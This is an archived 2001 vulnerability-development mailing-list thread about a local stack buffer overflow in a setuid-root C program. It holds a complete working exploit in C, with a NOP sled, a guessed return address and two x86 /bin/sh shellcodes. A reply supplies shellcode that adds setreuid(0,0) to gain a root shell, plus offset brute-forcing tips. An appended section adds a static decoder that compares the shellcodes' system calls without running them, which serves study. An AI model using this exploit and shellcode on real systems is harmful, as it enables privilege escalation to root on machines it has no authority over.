char linuxshell[] =
    "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0"
    "\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd"
    "\x80\xe8\xde\xff\xff\xff/bin/sh";

I think you're using the wrong shellcode... use this one: This shellcode only opens a normal shell with normal privileges *normal* *g*, so there should be a setreuid(0,0); so add this shellcode:

char shell[] =
    "\x31\xc9\x31\xdb\x89\xc8\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
    "\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
// I added the setreuid(0,0) in the shellcode as you can see at the beginning...

Greets
ConKing

PS: To test the offset.. or to brute force it.. to get the right offset use my offsetbruteforcer under www.usad.li/robin under MY PROGRAMS ...
Attention! ... It can be that you get a shell and only the same as afterwards.. then use CTRL + D until you get a root shell; it should work.. the offset is about 100 more than the buffer....

-----Original Message-----
From: roland kwitt [mailto:sniperat_private]
Sent: Thursday, 17 May 2001 16:16
To: VULN-DEVat_private
Subject: question on an exploit

hi folks,

recently i found a very good howto about buffer overflowing and tried to code an exploit for a little program.

#####################
Prog. to be exploited
#####################

#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[500];

    /* no length check: an argv[1] longer than 500 bytes overwrites the saved return address */
    if(argc>=2)
        strcpy(buffer, argv[1]);
    return 0;
}

As anybody can see the program does not check the size of the input copied in buffer. Therefore it should be possible to exploit it and gain root access through spawning a root shell.

The perms of that prog are set to:

418444 16 -rwsr-xr-x 1 root users 13335 May 17 15:22 vuln

The exploit looks like this:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUFFERSIZE 600 /* vulnerable buffer + 100 bytes */

char linuxshell[] =
    "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0"
    "\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd"
    "\x80\xe8\xde\xff\xff\xff/bin/sh";

/* current stack pointer (left in %eax, so it becomes the return value);
   the return address is guessed relative to it */
unsigned long sp(void)
{
    __asm__("movl %esp, %eax");
}

void usage(char *cmd)
{
    printf("\nusage: %s <offset>\n\n", cmd);
    exit(-1);
}

int main(int argc, char *argv[])
{
    int i, offset;
    long esp, ret, *addr_ptr;
    char *buffer, *ptr;

    if(argc<2)
        usage(argv[0]);

    offset = atoi(argv[1]);
    esp = sp();
    ret = esp-offset;

    printf("Stack pointer: 0x%lx\n", esp);
    printf("       Offset: 0x%x\n", offset);
    printf("  Return addr: 0x%lx\n", ret);

    if(!(buffer = malloc(BUFFERSIZE))) {
        printf("Couldn't allocate memory.\n");
        exit(-1);
    }

    /* fill the whole buffer with the guessed return address ... */
    ptr = buffer;
    addr_ptr = (long *)ptr;
    for(i=0; i<BUFFERSIZE; i+=4)
        *(addr_ptr++) = ret;

    /* ... put a NOP sled in the first half ... */
    for(i=0; i<BUFFERSIZE/2; i++)
        buffer[i] = '\x90';

    /* ... and the shellcode in the middle, so any return address that lands in the sled slides into it */
    ptr = buffer + ((BUFFERSIZE/2) - (strlen(linuxshell)/2));
    for(i=0; i<strlen(linuxshell); i++)
        *(ptr++) = linuxshell[i];

    buffer[BUFFERSIZE-1] = 0;

    execl("./vuln", "vulnerable", buffer, (char *)NULL);
    return 0;
}

As I tried to execute the exploit using "exploit 0" (offset) the only thing I got was an ordinary user shell but not a root shell. Can somebody tell me why the setuid flag is ignored!!

Thanks,
sniper!!
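The point ConKing makes is the one practitioners still trip over: execve("/bin/sh") from a setuid-root binary leaves uid = caller and euid = 0, and a shell that sees euid != uid resets euid to uid on startup, so the two shellcodes differ only in whether they issue setreuid(0,0) (Linux i386 syscall 70) before execve (syscall 11). The program below is an added example and not part of the thread: it decodes the small i386 opcode subset both shellcodes use, tracks the constants loaded into eax/ebx/ecx, and records the syscall number and first two arguments at every int 0x80, so the two blobs can be compared on any machine without running them or needing root. The function names (trace_syscalls, nth_syscall, regains_root_before_execve) are mine, the decoder stops at the first call because in the jmp/call/pop idiom the bytes after it are the "/bin/sh" string, and it deliberately refuses (returns -1) on any opcode it does not model rather than guessing.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Linux i386 system call numbers that occur in the two shellcodes. */
#define NR_EXIT     1
#define NR_EXECVE   11
#define NR_SETREUID 70

/* The shellcodes as posted in the thread: sniper's original, then ConKing's. */
static const unsigned char sc_plain[] =
    "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0"
    "\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd"
    "\x80\xe8\xde\xff\xff\xff/bin/sh";
static const unsigned char sc_setreuid[] =
    "\x31\xc9\x31\xdb\x89\xc8\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
    "\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

typedef struct { uint32_t val; int known; } reg_t;  /* index = i386 register number (eax=0, ecx=1, ebx=3, ...) */
typedef struct { int nr, ebx, ecx; } syscall_t;      /* -1 where the register value was not a known constant */

/* Bytes after the opcode for a ModRM operand: register-direct, [reg], [reg+disp8],
   [reg+disp32] or bare disp32.  Returns 0 for SIB forms, which are not modelled. */
static int modrm_len(unsigned char m)
{
    int mod = m >> 6, rm = m & 7;
    if (rm == 4 && mod != 3) return 0;
    if (mod == 0) return rm == 5 ? 5 : 1;
    if (mod == 1) return 2;
    if (mod == 2) return 5;
    return 1;
}

static int reg_or_unknown(reg_t r) { return r.known ? (int)r.val : -1; }

/* Linear scan of the code (assumption: the jmp/call/pop layout of these shellcodes, where
   byte order equals the order the instructions matter for register state).  Records eax,
   ebx, ecx at every "int 0x80".  Returns the number of syscalls found, -1 on an unmodelled
   opcode or on out[] overflow. */
static int trace_syscalls(const unsigned char *c, size_t len, syscall_t *out, int max)
{
    reg_t r[8] = {{0, 0}};
    size_t i = 0;
    int n = 0;

    while (i < len) {
        unsigned char op = c[i];
        if (op == 0xe8) break;                                   /* call rel32: the string follows */
        if (op == 0xeb) { i += 2; continue; }                    /* jmp rel8: keep scanning linearly */
        if (op == 0xcd) {                                        /* int imm8 */
            if (i + 1 >= len) return -1;
            if (c[i + 1] == 0x80) {
                if (n == max) return -1;
                out[n].nr  = reg_or_unknown(r[0]);
                out[n].ebx = reg_or_unknown(r[3]);
                out[n].ecx = reg_or_unknown(r[1]);
                n++;
            }
            i += 2; continue;
        }
        if (op >= 0x40 && op <= 0x47) { r[op - 0x40].val++; i++; continue; }      /* inc r32 */
        if (op >= 0x58 && op <= 0x5f) { r[op - 0x58].known = 0; i++; continue; }  /* pop r32 */
        if (op >= 0xb0 && op <= 0xb7) {                                           /* mov r8, imm8 */
            if (i + 1 >= len) return -1;
            int dst = op - 0xb0, shift = dst < 4 ? 0 : 8;                         /* al..bl or ah..bh */
            reg_t *d = &r[dst & 3];
            if (d->known) d->val = (d->val & ~(0xffu << shift)) | ((uint32_t)c[i + 1] << shift);
            i += 2; continue;
        }
        if (op == 0x31 || op == 0x29 || op == 0x89 || op == 0x88 || op == 0x87 || op == 0x8d) {
            if (i + 1 >= len) return -1;
            unsigned char m = c[i + 1];
            int l = modrm_len(m), reg = (m >> 3) & 7, rm = m & 7, direct = (m >> 6) == 3;
            if (l == 0 || i + 1 + l > len) return -1;
            if (op == 0x8d) r[reg].known = 0;                                    /* lea: a pointer, unknown */
            else if (direct && (op == 0x31 || op == 0x29)) {                     /* xor/sub r32, r32 */
                if (reg == rm) { r[rm].val = 0; r[rm].known = 1; } else r[rm].known = 0;
            }
            else if (direct && op == 0x89) r[rm] = r[reg];                        /* mov r32, r32 */
            else if (direct && op == 0x88) r[rm & 3].known = 0;                   /* mov r8, r8 */
            else if (direct && op == 0x87) { reg_t t = r[rm]; r[rm] = r[reg]; r[reg] = t; } /* xchg */
            /* memory-destination forms (mov [esi+8], esi etc.) leave registers alone */
            i += 1 + l; continue;
        }
        return -1;
    }
    return n;
}

/* Syscall number of the k-th int 0x80 in the code, or -2 if there is none. */
int nth_syscall(const unsigned char *c, size_t len, int k)
{
    syscall_t s[16];
    int n = trace_syscalls(c, len, s, 16);
    return (k >= 0 && k < n) ? s[k].nr : -2;
}

/* 1 if setreuid(0, 0) is issued before execve, i.e. the spawned shell keeps euid 0. */
int regains_root_before_execve(const unsigned char *c, size_t len)
{
    syscall_t s[16];
    int n = trace_syscalls(c, len, s, 16), i, root = 0;
    if (n < 0) return 0;
    for (i = 0; i < n; i++) {
        if (s[i].nr == NR_SETREUID && s[i].ebx == 0 && s[i].ecx == 0) root = 1;
        if (s[i].nr == NR_EXECVE) return root;
    }
    return 0;
}

int main(void)
{
    const struct { const char *name; const unsigned char *code; size_t len; } sc[] = {
        { "original", sc_plain,    sizeof sc_plain - 1 },
        { "ConKing",  sc_setreuid, sizeof sc_setreuid - 1 },
    };
    for (size_t k = 0; k < 2; k++) {
        syscall_t s[16];
        int n = trace_syscalls(sc[k].code, sc[k].len, s, 16);
        printf("%-8s:", sc[k].name);
        for (int i = 0; i < n; i++) printf(" syscall %d(ebx=%d, ecx=%d)", s[i].nr, s[i].ebx, s[i].ecx);
        printf(" -> %s\n", regains_root_before_execve(sc[k].code, sc[k].len) ? "root shell" : "shell with caller's uid");
    }
    return 0;
}
```

Run on the two blobs this prints execve/exit for sniper's shellcode and setreuid(0,0)/execve/exit for ConKing's, which is exactly the difference between the user shell he got and the root shell he expected. Because the check is static, it also works when the binary cannot be run locally (no root, wrong kernel, or a box with NX/ASLR where the 2001-era stack exploit would not land anyway); it only says what the bytes would ask the kernel for, not that the overflow itself works.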
This archive was generated by hypermail 2b30 : Mon May 21 2001 - 09:49:55 PDT